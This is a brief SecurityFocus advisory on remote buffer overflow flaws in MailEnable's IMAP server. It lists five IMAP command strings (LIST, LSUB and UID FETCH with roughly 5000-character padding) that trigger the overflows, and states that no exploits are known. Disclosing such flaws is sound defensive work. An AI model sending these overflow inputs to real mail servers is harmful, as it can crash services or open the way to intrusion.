MailEnable Multiple IMAP Remote Buffer Overflow Vulnerabilities

The following IMAP commands are sufficient to demonstrate these issues:

'02 LIST /.:/' + Ax5000
'02 LSUB' /.:/ ('A' x 5000) request
'02 UID FETCH /.:/' AX5000 ' FLAGS'
'02 UID FETCH /...'x5 ' FLAGS'
'02 UID FETCH '/\'x5000 '

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.


 

Privacy Statement
Copyright 2010, SecurityFocus